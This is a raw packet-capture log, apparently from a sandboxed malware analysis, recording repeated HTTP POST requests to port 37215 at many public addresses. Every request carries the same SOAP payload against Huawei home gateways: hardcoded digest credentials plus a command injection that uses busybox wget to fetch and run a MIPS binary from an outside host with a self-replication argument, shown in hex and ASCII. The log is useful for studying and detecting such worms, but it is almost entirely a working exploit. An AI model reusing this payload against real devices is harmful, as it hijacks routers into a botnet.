                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    9192.168.2.1446372197.140.67.3837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.088418007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.464147091 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    10192.168.2.144808641.117.164.4737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.088418007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.464147091 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    11192.168.2.1456006157.233.213.2337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.089380980 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.466916084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    12192.168.2.1455618157.52.181.20537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.093204975 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.485884905 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    13192.168.2.1434356197.178.199.18137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.093204975 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.485884905 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    14192.168.2.1446530197.48.229.17537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.093205929 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
